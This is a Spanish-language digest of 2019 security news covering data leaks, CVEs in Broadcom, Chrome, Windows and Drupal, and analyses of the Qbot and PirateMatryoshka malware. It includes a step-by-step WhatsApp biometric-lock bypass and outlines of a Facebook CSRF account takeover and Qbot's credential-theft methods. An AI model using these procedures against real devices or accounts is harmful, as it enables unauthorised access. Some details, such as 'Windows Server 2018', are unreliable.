El fallo, descubierto por el equipo de ingenieros de WP, residía en la forma en que la aplicación de WordPress para iOS estaba obteniendo las imágenes de blogs privados (Imgur, Flickr, etc.).

Eso significa que, si una imagen estaba alojada en algún blog que no pertenecía a WordPress, cuando la aplicación de iOS intentaba obtener la imagen, enviaba un token de autorización de WordPress.com al blog concreto, dejando una copia del mismo en los registros de acceso del servidor.

Curiosamente, la aplicación para dispositivos Android y los sitios web de WordPress auto hospedados no se ven afectados por este fallo.

Nivel de afectación:

Según Auttomatic, la vulnerabilidad afecta a todas las versiones de la aplicación de WordPress para iOS lanzada en los últimos dos años y fue parcheada el mes pasado con el lanzamiento de la versión 11.9.1.

Aunque la empresa no reveló con precisión cuantos usuarios o blogs se vieron afectados por el problema, si confirmó que no hay indicios de que haya habido una explotación malintencionada del fallo.

Además, la compañía ha tomado la precaución de restablecer los tokens de acceso y enviar un mensaje de advertencia a todos los usuarios de iOS con blogs privados.

Desde Hispasec recomendamos a todos los propietarios de blogs que hagan uso de la aplicación de WordPress para dispositivos iOS, que actualicen su aplicación inmediatamente.

Más información
https://www.zdnet.com/article/wordpress-ios-app-leaked-authentication-tokens/

Encontrados datos de 540 millones de usuarios de Facebook en un servidor de Amazon desprotegido.

Los datos filtrados no provienen directamente de Facebook, sino que fueron recolectados por los desarrolladores de una app.

Hace unos días la compañía fue sorprendida pidiendo a algunos de sus usuarios las credenciales de acceso a sus cuentas de correo. Hoy nos encontramos con que los datos de millones de usuarios estaban desprotegidos en un servidor de Amazon.

Investigadores de la compañía UpGuard descubrieron dos datasets distintos: la primera pertenece a una compañía de medios mejicana llamada Cultura Colectiva y la otra a una app integrada en Facebook llamada At the pool.

Los datos recolectados por Cultura Colectiva contienen 540 millones de registros de usuarios. Incluyen: comentarios, likes, nombres de cuenta, ID de usuario de Facebook, etc.

En cuanto al leak de la app At the Pool, ésta contiene información sobre los amigos de los usuarios, likes, grupos, localizaciones gps, así como nombres de usuario, contraseñas en texto plano y direcciones de correo de 22000 usuarios.

En Upguard creen que las contraseñas encontradas en la base de datos pertenecen a la app At the Pool y no son directamente credenciales de Facebook, pero dado que con muchísima frecuencia se suelen reutilizar las credenciales para varios servicios, éstas podrían ser válidas para acceder a famosa red social.

Ambos datasets estaban en un bucket S3 desprotegido, que ahora se encuentra securizado después de que el propio Facebook y Cultura Colectivacontactaran con Amazon.

Más Información:

https://thehackernews.com/2019/04/facebook-app-database.html

Múltiples vulnerabilidades en los controladores de dispositivos WiFi Broadcom

El pasado 17 de abril se hicieron públicas varias vulnerabilidades en los driver para chipsets de tarjetas WiFi Broadcom que permitirían explotar varios desbordamientos de memoria para ejecutar código arbitrario.

El driver propietario ‘wl‘ presenta dos fallos que podrían provocar desbordamientos de la memoria basada en ‘heap‘. Su versión open-source, ‘brcmfmac‘ también presenta varios errores de validación que podrían desencadenar desbordamientos de memoria.

Vulnerabilidades en el driver ‘brcmfmac’

CVE-2019-9503

Cuando se recibe una trama desde una fuente remota, la función ‘is_wlc_event_frame‘ la descarta sin procesarla. Sólo si la trama proviene de la máquina anfitrión, se recibirá y procesará correctamente. Un error de validación en dicha función podría permitir a un atacante remoto enviar tramas desde una fuente remota no permitida.

CVE-2019-9500
Un atacante local podría desencadenar un desbordamiento de la memoria basada en ‘heap a través de una trama especialmente diseñada que desencadene un evento en el módulo ‘Wake-up on Wireless LAN‘, en la función ‘brcmf_wowl_nd_results‘. Esta vulnerabilidad combinada con el error de validación anterior, permitiría explotar este fallo de forma remota.

Vulnerabilidades en el driver ‘wl’

CVE-2019-9501
Un error de validación en la función que controla el proceso de autenticación ‘wlc_wpa_sup_eapol‘ podría ser aprovechado por un atacante para provocar un desbordamiento de la memoria basada en ‘heap‘.

CVE-2019-9502
Otro fallo de validación en la función ‘wlc_wpa_plumb_gtk‘, provocaría un desbordamiento de la memoria basada en ‘heap’ si se supera el límite de 164 bytes en el campo que almacena la información sobre el fabricante.

Cuando se utiliza el chipset SoftMAC, estas vulnerabilidades afectarían al kernel de la máquina anfitrión. Cuando se trate de un chipset FullMAC, se ejecutarían en el firmware del chipset.

En el peor de los casos estas vulnerabilidades permitirían a un atacante remoto no autenticado ejecutar código arbitrario en el sistema vulnerable. Más comúnmente, la explotación de estos fallos resultaría en una denegación de servicio.

Ambos driver ya han sido parcheados y se recomienda actualizar cuanto antes.

Microsoft confirma problemas con antivirus en su actualización KB4493472

Tras el lanzamiento de la actualización mensual para Windows 7 KB4493472, Microsoft informó que algunos antivirus como ArcaBit, Avast, Avira, McAfee y Sophos podrían presentar problemas a la hora de iniciarse o durante su ejecución tras la instalación.

En su página de soporte, se advierte que las compañías implicadas han identificado el problema de inestabilidad provocado por la actualización y que de momento está investigando cómo resolverlo. Mientras tanto, la única opción posible para evitar los problemas reportados consiste en bloquear la actualización del sistema operativo.

Los efectos de la actualización de seguridad sobre los dispositivos que tuviesen instalados estos programas antivirus podrían experimentar desde tiempos de arranque más lentos hasta un empeoramiento de su rendimiento o incluso la inestabilidad del sistema operativo.

Se informa que los dispositivos con Windows 8.1 y Windows 10 también podrían verse afectados con las últimas actualizaciones del subsistema Client Server Runtime Subsystem (CSRSS) de abril de 2019, debido a que Microsoft ha introducido un posible interbloqueo con ENS.

Facebook revela que almacenaba contraseñas de usuario en texto plano

Imagen extraída de iMyFone

A fines del mes pasado, Facebook reveló que almacenaba las contraseñas de multitud de usuarios de Facebook e Instagram en texto sin formato. No obstante, hace poco se actualizó el comunicado de prensa de marzo aumentando la cantidad de usuarios de Instagram afectados desde las decenas de miles iniciales hasta el orden de cientos de millones de usuarios.

Al almacenarse en texto plano, las contraseñas de estos usuarios de Facebook y de Instagram eran de libre acceso para determinados ingenieros de la compañía. Facebook asegura que no se ha realizado ningún uso ilegítimo de las mismas por parte de su personal.

Según la compañía: “Desde que se publicó esta nota de prensa, hemos descubierto registros adicionales con contraseñas de Instagram en formato legible. Estimamos que este problema ha afectado a millones de usuarios de Instagram. Notificaremos a estos usuarios como se hizo los anteriores. Nuestra investigación ha determinado que las contraseñas almacenadas no fueron objeto de abuso interno ni de acceso indebido.”

Esta información ha aparecido menos de un día después de que se revelase que Facebook había almacenado información de contacto de hasta 1,5 millones de usuarios en sus servidores, sin su consentimiento ni conocimiento, desde mayo de 2016.

Como en cualquier caso similar, se recomienda a los usuarios de Facebook e Instagram que cambien sus contraseñas de acceso y activen el sistema de verificación en dos pasos para proteger sus cuentas.

Más información:

Microsoft Outlook: nueva brecha de seguridad

El 14 de abril conocimos, a través de la plataforma Reddit, una captura de pantalla de un usuario que avisaba de haber recibido un e-mail de Microsoft alertando de que atacantes desconocidos habían sido capaces de acceder a alguna información de su cuenta de Outlook.

Al parecer, la brecha tuvo lugar en el primer trimestre del año, entre el día 1 de Enero y el 28 de Marzo, tal y como muestra este usuario en Reddit mediante su captura y como es corroborado por más usuarios de la plataforma.

Según el e-mail por parte de Microsoft en el que se notificaba la incidencia, que podemos ver en la foto adjunta, los atacantes comprometieron las credenciales de la cuenta de uno de los agentes de soporte de Microsoft y la utilizaron de manera no autorizada para acceder a alguna información relacionada con las cuentas afectadas. Sin embargo, parece ser que el contenido o los adjuntos de los e-mails no fue objeto de acceso no autorizado.

Noticias de Seguridad Marzo 2019

Hallada vulnerabilidad en la nueva función biométrica de Whatsapp

La nueva función de análisis biométrico agregada al servicio de mensajería instantánea Whatsapp presenta una vulnerabilidad que permitiría a un atacante acceder sin realizar la autentificación biométrica.

Resultado de imagen de whatsapp biometric
Extraído de dignited.com

Después de varias semanas, tras la implantación del servicio de análisis biométrico para la autentificación del usuario en las cuentas de Whatsapp (https://www.biometricupdate.com/201901/biometric-authentication-coming-to-whatsapp), los especialistas del Instituto Internacional de Seguridad Cibernética han informado del descubrimiento de una vulnerabilidad que afecta a este nuevo servicio.

El reconocimiento biométrico para acceder a la aplicación mientras el terminal esté desbloqueado puede suponer una medida extra de seguridad con la que proteger el contenido confidencial de los usuarios, aunque aparentemente presenta algunos inconvenientes en su implementación. De momento solo está disponible para algunos dispositivos Apple.

Un usuario de la red social Reddit encontró un inconveniente de seguridad en esta nueva función que consiste en que un usuario puede acceder a WhatsApp desde la iOS Share Sheet sin necesidad de realizar previamente la identificación biométrica. De modo que si el usuario configura el inicio de sesión biométrico inmediato no se verá afectado por esta vulnerabilidad; sin embargo, si el usuario selecciona un intervalo de tiempo, el acceso a la iOS Share Sheet permite restablecer el temporizador, dejando el acceso a Whatsapp libre.

Según el usuario, el proceso para explotar esta falla es:

  • Acceder a la iOS Share Sheet, por ejemplo, a través de la aplicación de fotos.
  • Pulsar el icono de WhatsApp en la iOS Share Sheet.
  • Ir a la pantalla de inicio de iOS durante la transición a la siguiente pantalla, aprovechando que la verificación de FaceID o TouchID no se realiza si una opción diferente se establece en “inmediatamente” por adelantado.
  • Abrir WhatsApp, puesto que ya no se realizará la identificación biométrica (ya sea por reconocimiento facial o huellas dactilares).

Los equipos de seguridad de la red de Facebook, la compañía propietaria de WhatsApp, afirman que ya han identificado la vulnerabilidad y que están en proceso de implementar el correspondiente parche de seguridad. Mientras tanto, se recomienda que se configure el intervalo de bloque de pantalla en la opción “inmediatamente” si se desea seguir usando esta función de forma segura.

Más información:

Security Newspaper

Google revela un error de “alta severidad” sin parchear en el núcleo de Apple macOS

Investigadores de Google Project Zero han hecho pública una vulnerabilidad en macOS, después de que Apple no haya liberado un parche en los 90 días previos a la publicación.

Descubierto por el investigador Jann Horn y demostrada por Ian Beer. La vulnerabilidad reside en la forma que el kernel de macOS, XNU, permite a un atacante manipular el sistema de ficheros sin informar al Sistema Operativo.

Esta vulnerabilidad podría permitir a un programa malicioso saltarse la funcionalidad Copy-on-Write (COW) y modificar la memoria compartida entre procesos, llegando a corromperla.

Copy-On-Write o COW es una optimización en la administración de recursos usada en computación. En este caso, se da cuando un proceso necesita un fichero o dato que ya se encuentra en la memoria de otro proceso. Ambos procesos pueden compartir dicho recurso en lugar de crear una nueva copia, reduciendo de esta forma recursos.

Sin embargo, si uno de estos procesos necesita realizar algún cambio sobre el recurso, la función COW aparece y crea una nueva copia en la memoria, de forma que el otro proceso pueda también tener acceso al recurso.

Los investigadores vieron que cuando la imagen de un sistema de ficheros montado es modificada directamente (con la llamada pwrite() ), esta información no es propagada en el sistema de ficheros montado.

Por tanto, un programa malicioso puede hacer cambios en la memoria liberada almacenada en el disco sin informar al subsistema de administración virtual (virtual management subsystem), engañando al proceso destino para que cargue contenido malicioso en la memoria.

La vulnerabilidad fue notificada a Apple en noviembre de 2018 y ésta reconoció la existencia del fallo. Pero a día de hoy aun no se ha solucionado a pesar del aviso. De modo que los investigadores han publicado la falla con criticidad alta y también han liberado una prueba de concepto.

Más información:

https://thehackernews.com/2019/03/cybersecurity-macos-hacking.html

Zero-Day en Google Chrome permite la ejecución remota de código

La vulnerabilidad, del tipo corrupción de memoria y que afecta a Windows, MacOS y Linux, habría estado siendo aprovechada por atacantes.

chrome

Clement Lecigne, del Grupo de Análisis de Amenazas de Google, ha reportado una vulnerabilidad con identificador CVE-2019-5786 que permitiría la ejecución arbitraria de código en la máquina de la víctima, para así tomar su control. Aunque no se han revelado detalles, según Google el fallo habría estado siendo aprovechado por atacantes.

Desde Google han decidido restringir los detalles de la vulnerabilidad hasta que la mayoría de usuarios hayan actualizado; lo único que se conoce de momento de este fallo de corrupción de memoria, es que se produce tras intentar acceder a memoria que ya ha sido liberada (‘use-after-free’), y que afecta al componente API FileReader. Dicha API, es la encargada de leer ficheros de forma asíncrona desde la máquina del usuario.

Debido a la alta gravedad de la vulnerabilidad, se recomienda a todos los usuarios de Google Chrome para las plataformas Windows, MacOS y GNU/Linux, actualizar a la última versión, la cual debe ser igual o superior a 72.0.3626.121. En Windows y MacOS, normalmente estas actualizaciones se encuentran activadas por defecto, aunque pueden forzarse accediendo a chrome://settings/help. En el caso de la mayoría de distribuciones GNU/Linux, éstas deben realizarse por el gestor de paquetes del sistema.

Fuente:

Stable Channel Update for Desktop:
https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html

Microsoft parchea 64 vulnerabilidades

El pasado martes día 12 de marzo, Microsoft liberó un paquete de parches que solucionan un total de 64 vulnerabilidades. 17 de ellas críticas, 45 importantes, y dos de criticidad baja y moderada.

Los productos afectados son Windows, Internet Explorer, Edge, Office, Office SharePoint, ChakraCore, Skype for Business, and Visual Studio NuGet.

Microsoft parchea también dos vulnerabilidades de día cero que se están explotando activamente. Ambas fallas residen en el componente Win32k. La primera de ellas (CVE-2019-0808) puede ser explotada en combinación con la vulnerabilidad en Chrome descubierta la semana pasada y permite a un atacante remoto ejecutar código arbitrario en máquinas con Windows 7 o Windows Server 2018.

La segunda vulnerabilidad, con ID CVE-2019-0797, es similar a la primera y también se está explotando activamente en Internet. Ésta afecta a Windows 10, 8.1, Server 2012, 2016, y 2019.

Como hemos dicho, este parche acumulativo soluciona 17 vulnerabilidades críticas y otras 45 con carácter importante. La mayoría de las categorizadas como críticas permiten la ejecución remota de código y afectan principalmente a Windows 10 y a las ediciones Server.

Como siempre, Microsoft recomienda aplicar las últimas actualizaciones de seguridad.

Más Información:

https://thehackernews.com/2019/03/microsoft-windows-security-updates.html

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0797

Brecha de seguridad en Citrix expone 6TB de información sensible

La famosa compañía de software Citrix, reveló que el pasado 6 de marzo sufrió una brecha de seguridad ocasionada por cibercriminales Iraníes que ha permitido a los atacantes revelar 6TB de información sensible de distintos clientes. El reporte le llegó a Citrix la semana pasada por parte del FBI.

Aunque aún no hay evidencias del método utilizado, el FBI considera que se ha utilizado una técnica conocida como “password spraying“, un tipo de ataque por fuerza bruta en el que se comprueban un número reducido de contraseñas comunmente utilizadas contra múltiples usuarios. A diferencia de los ataques por fuerza tradicionales en los que se trata de vulnerar una única cuenta.

Los investigadores de Resecurity ya reportaron en diciembre de 2018 que el grupo de cibercriminales IRIDIUM habían atacado a más de 200 gobiernos, compañías de gas y petróleo o compañías tecnológicas entre otras. [Su reporte]. No obstante, Citrix no ha actuado hasta este último reported del FBI alertando sobre la brecha de seguridad.

Por otro lado, el Presidente de Resecurity ha afirmado para NBC News que IRIDIUM logró acceder a la red interna de Citrix hace 10 años y que han permanecido dentro de la infraestructura desde entonces, accediendo posiblemente a información sensible.

La noticia de este incidente de seguridad ha llegado a Forbes, los cuales han manifestado la gravedad del incidente dado que -como comentan- Citrix provee servicios a más de 400.000 compañías y alrededor del 98% de las compañías dentro de la lista Fortune 500.

“Citrix provides virtual private network access and credentials to 400,000 companies and other organizations worldwide and 98% of the Fortune 500”

Cabe destacar que entre las empresas dentro de la lista de Fortune 500 se encuentran Walmart(puesto 1), Apple (puesto 4), Amazon (puesto 8) o grandes bancos como Deutsche Bank(puesto 223), por lo que se manifiesta la gran problemática de permitir el acceso a información confidencial a usuarios no autorizados.

Si realizamos una búsqueda por Shodan en busca de máquinas virtuales de Citrix, nos encontramos (a fecha de hoy) más de 3000 máquinas de distintos países, estando España en el segundo puesto de máquinas Citrix con 162, sólo por detrás de EEUU con 1403.

Entre las máquinas que hemos podido encontrar con esta simple búsqueda, nos cabe destacar empresas petroleras en Arabía Saudí entre otras.

Se pone de manifiesto la facilidad para cibercriminales como IRIDIUM de realizar ataques como los de “password spraying” utilizando servicios tales como HaveIBeenPwned para conocer, en su sección de Passwords, si una determinada contraseña ha aparecido en algún leak. Nos percatamos que hay una gran cantidad de usuarios utilizando contraseñas poco complejas como “password”, la cual aparece más de 3 millones de veces en la base de datos de HaveIBeenPwned.

Para minimizar el riesgo a sufrir ataques como los expuestos, se recomienda utilizar contraseñas robustas más algún 2FA para dificultar el acceso no autorizado de cibercriminales a nuestros sistemas.

Más información:
TheHackerNews
https://thehackernews.com/2019/03/citrix-data-breach.html

Forbes
https://www.forbes.com/sites/kateoflahertyuk/2019/03/10/citrix-data-breach-heres-what-to-do-next/#5a4d8eb61476

NBC
https://www.nbcnews.com/politics/national-security/iranian-backed-hackers-stole-data-major-u-s-government-contractor-n980986

Resecurity
https://resecurity.com/blog/supply-chain-the-major-target-of-cyberespionage-groups/

Blog de Citrix
https://www.citrix.com/blogs/2019/03/08/citrix-investigating-unauthorized-access-to-internal-network/

PirateMatryoshka, el malware que afecta a The Pirate Bay

No es la primera vez que los cibercriminales utilizan páginas de descargas de torrents para enmascarar malware, es una práctica bien conocida que programas, juegos y contenidos multimedia codiciados puedan ser susceptibles de ocultar algún tipo de malware. En este caso le ha tocado a The Pirate Bay, un blanco muy atractivo para los atacantes debido a su gran popularidad.

El Torrent

El equipo de Kaspersky ha descubierto que PirateMatryoshka se está haciendo pasar por programas de software populares que, en su lugar, descargan un troyano. Su objetivo es infectar los ordenadores de los usuarios con programas publicitarios y herramientas para la instalación de malwareadicional y cuenta con una estructura por capas, de ahí el nombre.

PirateMatryoshka consigue engañarnos disfrazándose de versiones pirateadas de algún software legítimo, pero en realidad es un descargador de troyanos.

Según Kaspersky, una vez que un usuario pulsa en el instalador comienza el proceso de infección. Primero muestra un phishing de la página de The Pirate Bay para que el usuario ingrese sus credenciales y poder continuar con la instalación. Estos usuarios son utilizados como mulas por el malware para su propia distribución. El proceso de instalación está diseñado para continuar aunque no se hayan ingresado las credenciales del usuario y el enlace alphishing ha sido visitado más de 10.000 veces

En paralelo comprueba el registro de Windows HKEY_CURRENT_USER \ Software \ dSet y se asegura de que sea la primera vez que se instala en el ordenador del usuario. Si existe, termina la ejecución. Si el resultado de la comprobación es negativo, el instalador busca el servicio pastebin.com para obtener un enlace al módulo adicional y su clave de descifrado.

Después descarga un instalador que se utiliza para ejecutar los archivos portables: oyce.exe, setupDiv.exe, coduc.exe y xVid.exe.

El segundo y el cuarto de los programas mencionados son descargadores de los programas de AdWare, InstallCapital y MegaDowl. El primero y el tercero son autoclickers que se usan para que el usuario no cancele las instalaciones y para seleccionar las casillas necesarias en InstallCapital y MegaDowl.

Nos encontramos ante una combinación entre software sofisticado y multifuncional capaz de distribuirse de forma efectiva. En la siguiente imagen podemos ver como quedaría un PC infectado por PirateMatryoshka.

Fuentes:
https://securelist.com/piratebay-malware/89740/

https://testdevelocidad.info/blog/un-malware-de-tipo-muneca-rusa-se-expande-a-traves-de-piratebay/

Qbot reaparece como Qakbot para atacar a entidades financieras

Se ha publicado la noticia en la que se alerta de la evolución del malware bancario Qbot, a la se le ha denominado como Qakbot.

Qbot fue un malware bancario detectado en 2009 y cuya actividad era la infección de las máquinas para la obtención de credenciales bancarias, actividad que consiguió afectar miles de ordenadores.

La detección de la muestra se ha logrado gracias a un comportamiento anómalo detectado en una de las redes monitorizadas por la solución data-alert de Varonis. Después de su detección y análisis se ha publicado un estudio alertando de la evolución de esta familia de malware.

Ataque e infección:

Fichero analizado: REQ_02132019b.doc.vbs
sha1: c4b0e2161b44fa580d00cccd3b3c70b957d6f64

Lo más relevante de la evolución del malware es sin duda su polimorfismo es decir, que se encuentra cambiando continuamente, dificultando muchísimo su análisis estático. También ha llamado la atención la aleatoriedad de los nombres que componen el proceso de infección así como la diferencia de comportamiento de la muestra cuando esta está conectada a Internet o no.

La muestra analizada intentaba enmascararse bajo un fichero ‘*.doc’ (Microsoft Word) cuando en realidad era un fichero ‘.*vbs’ (VisualBasicScript) utilizando un ataque de doble extensión (‘*.doc.vbs’), el cual era enviado como adjunto en un correo electrónico fraudulento, técnica habitualmente conocida y practicada por todo tipo de atacantes.

Para las comunicaciones iniciales esta muestra utilizaba ‘BITSAdmin’ desde el script de Visual Basic. Una herramienta de línea de comandos, creada para monitorizar los procesos de transferencias de red. Técnica astuta por parte de los creadores de la muestra ya que con esto evitan el uso de ‘PowerShell’ que está mucho más monitorizada por los motores antivirus.

A continuación se muestran las direcciones web de descarga de los archivos de configuración de la muestra.

Persistencia y robo:

Nombre del fichero: widgetcontrol.png
sha1: 10c540521ae79a8631daa3db4ab958744ffc3f39

El archivo descargado, será inyectado en el proceso explorer.exe del sistema, proceso necesario para el entorno gráfico de Windows. El archivo inyectado será, o puede ser, diferente en cada ejecución del malware, característia añadida en el complejo polimorfismo del que dispone la muestra.

Otra característica importante del archivo descargado es que viene firmado digitalmente, esto permite que el sistema operativo no alerte de que un archivo sospechoso se va a ejecutar. Para que el fichero descargado esté validado correctamente, debe de ser firmado con un certificado, previamente autorizado por una entidad de confianza. En muchos casos, estos certificados son obtenidos en ataques previos a otras entidades.

Los certificados utilizados por el malware son los siguientes:

  • Saiitech Systems Limited
  • ECDJB Limited
  • Hitish Patel Consulting Ltd
  • Doorga Limited
  • INTENTEK LIMITED
  • Austek Consulting Limited
  • IO Pro Limited
  • Vercoe IT Ltd
  • Edsabame Consultants Ltd
  • SOVA CONSULTANCY LTD

Una vez descargado estos ficheros el malware creará varias vías para mantener la persistencia en el sistema:

  • Creación de una clave en el registro de Windows para que arranque una vez se inicie el sistema operativo.
  • Programación de una tarea a través de una líne a de comandos utilizando el programador de tareas de Windows.
  • Creación de un enlace en la carpeta de inicio de Windows.

Una vez tiene persistencia en el equipo de la víctima, el malware utilizará diversas técnicas para el robo de credenciales:

  • A través de un keylogging, es decir, mediante la monitorización de las teclas pulsadas por el usuario.
  • A través de las cookies guardadas en el navegador del sistema.
  • A través del hookeo de las llamadas a las API de ciertas entidades financieras, es decir mediantes la monitorización y modificación de las comunicaciones de red con las entidades financieras.

En el momento de la investigación el servidor de control y comandos (C&C) estaba activo, permitiendo ver a los investigadores el alcance de la muestra, que aunque la campaña de infección está centrada en Estados unidos, también se ha encontradon rastros de actividades en Parte de Asia, Europa y Sudamérica.

Más información:

Varonis Exposes Global Cyber Campaign: C2 Server Actively Compromising Thousands of Victims.
https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/

Qbot-analysis
https://github.com/varonis/qbot-analysis

Análisis preliminar de Ghidra, el framework de reversing de la NSA.

En la noche de ayer (del 5 al 6 de marzo) fue liberado el nuevo framework de ingeniería inversa de la NSA denominado “Ghidra”. Hoy os contamos nuestras primeras impresiones tras haber realizado algunas pruebas.

URL de descarga: https://www.ghidra-sre.org/

Instalación:

Ghidra funciona sobre Windows, Mac y Linux. Instalar este framework es tan simple como descomprimir el archivo ZIP de la descarga en nuestro equipo. El único requisito para el correcto funcionamiento del software es tener instalada la versión 11 de Java Development Kit o superior.

Si aún así tenéis alguna duda, en la web proporcionada hay un pequeño vídeo explicativo.

Primeras impresiones:

Lo primero que podemos ver al abrirla es que se trata de la versión 9.0 del programa, por lo que puede inferirse que lleva muchos años siendo utilizada y que ha pasado por numerosas etapas para la mejora de su código, lo que, en principio, nos lleva a pensar que estamos ante una herramienta madura y a prueba de errores.

Al crear un nuevo proyecto, nos muestra un baúl de herramientas con dos opciones: “CodeBrowser” y “Version Tracking”. Analizaremos en esta ocasión la herramienta “CodeBrowser”.

Si abrimos un binario, la herramienta nos lo analiza y nos muestra el desensamblaje del código en una interfaz que nos parece bastante amigable, en comparación con otros frameworks similares.

Aunque los tiempos de carga son casi mínimos, la optimización del consumo de recursos no es su punto fuerte, ya que consume bastante más que otras herramientas que tienen el mismo objetivo.

Como punto a favor de su usabilidad, existe una cheatsheet oficial con los shortcuts más importantes del programa. Puede accederse a la plantilla a través de este enlace.

Fallos reconocidos en las primeras 12 horas:

Apenas unas horas después de la salida del producto, varios expertos en ciberseguridad se han hecho eco de un fallo en la apertura del puerto JDWP (18001) en el modo debugque se pone a la escucha en todas las interfaces y permite ejecución de código remoto. A continuación vemos un ejemplo del fallo que describimos:

Usando un motor de búsqueda de dispositivos conectados a internet como shodan.io podemos ver ya algunos equipos que ahora mismo podrían ser vulnerados.

La solución más simple sería modificar el código que hace referencia a la interfaz y ponerlo solo a la escucha en localhost.

El issue se encuentra abierto en Github ahora mismo. URL: https://github.com/NationalSecurityAgency/ghidra/issues/6.

Opiniones publicadas:

Varios expertos en reversing ya se han pronunciado sobre la herramienta, manteniendo diferentes opiniones sobre la utilidad del producto:

Para estar al tanto de la opinión de la comunidad acerca de Ghidra, existe un post anclado en Reddit: https://www.reddit.com/r/ReverseEngineering/comments/ax2gma/ghidra_stickied_thread/

Cibercriminales están explotando activamente una vulnerabilidad Drupal

Una vulnerabilidad descubierta recientemente en Drupal esta siendo explotada activamente por cibercriminales

El pasado 19 de Febrero se hizo pública una nueva vulnerabilidad (CVE-2019-6340) para el sistema de gestión de contenidos Drupal, justo después de que sus desarrolladores publicasen una nueva versión que la resuelve.
El fallo de seguridad es del tipo RCE (Remote Code Execution), es decir, que la explotación de la vulnerabilidad permite la ejecución remota de código en el servidor en el que se aloja Drupal.
El fallo se trata de un ‘Object Injection’, una vulnerabilidad típica en aplicaciones desarrolladas en PHP, y que consiste en proporcionar un objeto PHP serializado a través de una petición HTTP que será posteriormente deserializado en el servidor. Dicha deserialización transformará el objeto serializado en un objeto real PHP que podrá ejecutar código.
Aunque haya sido corregida, aún muchos usuarios de este popular gestor de contenidos no han tenido la oportunidad de actualizar a la nueva versión para estar protegidos. Por ello, los cibercriminales están aprovechando la situación explotando este fallo de seguridad para comprometer el sistema e inyectar en las webs código JavaScript para minar criptomonedas. Este código JavaScript pertenece a CoinIMP, un servicio de minado de criptomonedas para navegadores similar a CoinHive.
Desde Hispasec, como siempre, os recomendamos actualizar lo antes posible vuestro Drupal para estar protegidos frente a estos ataques.

Miles de servidores C&C de malware expuestos por una vulnerabilidad

Una vulnerabilidad en un software utilizado por los cibercriminales ha permitido revelar la ubicación de miles de servidores de mando y control o C&C (del inglés ‘command and control’) de malware.

Imagen de cobaltstrike.com

Cobalt Strike es una herramienta legítima de prueba de penetración con una arquitectura cliente-servidor, utilizada por los investigadores de seguridad para probar la resistencia de una organización contra ataques dirigidos. En los últimos años, Cobalt Strike se ha convertido en parte del kit de herramientas utilizado por desarrolladores de malware y grupos cibercriminales como FIN6 y FIN7 (Carbanak) o APT29 (Cozy Bear). Los atacantes aprovechan Cobalt Strike para alojar sus servidores de C&C de malware que se comunican con los equipos infectados a través de ‘beacons’.

Sin embargo una vulnerabilidad en este software ha resultado clave para descubrir las ubicaciones de miles de servidores de comando y control de malware (C&C). El fallo se encontraba en el código de NanoHTTPD, un servidor web de código abierto basado en Java, al agregar un espacio en blanco adicional después del código de estado de las respuestas HTTP. Dicha particularidad en las respuestas del servidor ha sido utilizada por investigadores de la empresa de seguridad Fox-IT para detectar las comunicaciones entre los ‘beacons’ y sus servidores C&C desde 2015.

Espacio en blanco adicional en la respuesta HTTP

Desde ese año hasta el pasado mes de enero de 2019, cuando los desarrolladores de Cobalt Strike corrigieron el error, los investigadores de Fox-IT han observado un total de 7718 servidores de Cobalt Strike. Aunque, como cabe esperar, muchos de ellos son legítimos también se incluyen servidores C&C de malware vinculados a la unidad de piratería gubernamental APT10 de China, del troyano bancario Bokbot, y Carbanak.

Los investigadores de seguridad han revelado una lista de direcciones IP que alojaban o siguen alojando servidores C&C de Cobalt Strike.

KnownSec 404 Team, una empresa china de seguridad IT ha confirmado el descubrimiento de Fox-IT al identificar 3643 servidores basados ??de Cobalt Strike operativos (un 86% de los cuales se corresponden con la lista suministrada por Fox-IT).

Según aventuran los investigadores de Fox-IT, el truco de la exploración del espacio en blanco cada vez redundará en un menor número de resultados debido a que los servidores legítimos se están actualizando a la versión 3.13, con la vulnerabilidad corregida. Sin embargo también opinan que, debido a que los delincuentes cibernéticos tienden a utilizar versiones no legítimas de software, estas se quedarán sin recibir la actualización y por tanto los servidores de C&C de malware podrán seguir siendo rastreados. Al menos durante un tiempo.

Más información:

Identifying Cobalt Strike team servers in the wild
https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/

Historical list of {Cobalt Strike,NanoHTTPD} servers
https://github.com/fox-it/cobaltstrike-extraneous-space/

Arrestado el líder detrás de Cobalt y Carbanak
https://unaaldia.hispasec.com/2018/03/arrestado-el-lider-detras-de-cobalt-y-carbanak.html

La mayor plataforma de Bug Bounty confirma el tópico. Jóvenes, americanos y sin estudios superiores.

HackerOne ha publicado un informe donde son encuestados más de mil investigadores de seguridad para obtener las últimas estadísticas, tendencias y perspectivas de la comunidad.

El informe comparte distintas estadísticas, como las edades, ubicación, estudios y preferencias de sus usuarios, en las que, como citamos en el título de la noticia, se confirman algunos de los tópicos que rodean la figura del hacker.

En él también se da a conocer como dos de los usuarios, Mark Litchfield y Santiago López, han alcanzado el millón de euros en recompensas a través de su plataforma.

Para los que no lo sepan, una plataforma de Bug Bounty, es la encargada de la mediación entre las empresas y los investigadores de seguridad. Por un lado las empresas ofrecen recompensas para que los investigadores hagan una publicación responsable de las vulnerabilidades encontradas y los investigadores reconocimiento y una compensación económica.

Entre otros datos llamativos, cabe destacar la herramienta Burp Suite, como la favorita entre los investigadores de seguridad.

A través del siguiente enlace podéis descargar el informe completo.

Noticias de Seguridad Febrero 2019

Secuestro de cuenta en Facebook

Se ha hecho público la existencia de un salto de restricciones en la protección CSRF en Facebook que podría permitir a un atacante remoto obtener la cuenta de otro usuario de la red social.

Para que el ataque pueda hacerse efectivo es necesario la implicación de la víctima para que acceda a un enlace especialmente manipulado previamente preparado por el atacante. Dicho a groso modo, este enlace vulnerable, bajo el dominio de Facebook, hará otra petición a una dirección escogida por el atacante la cual añadirá el parámetro ‘fb_dtsg’ en el cuerpo de la petición, esto junto a algunas redirecciones, permitirán al atacante hacerse con el control de la cuenta de la víctima.

Aunque a groso modo parece una tarea sencilla, no lo es. A continuación se detalla el proceso de toma de control de otra cuenta de la red social.

Para la toma de control de la cuenta es necesario la adición en la cuenta de la víctima una cuenta de correo electrónico o número de teléfono en manos del atacante. Esto cuenta con el problema de que la víctima debería de visitar dos direcciones web, una para añadir el correo/teléfono y otra para confirmar la acción.

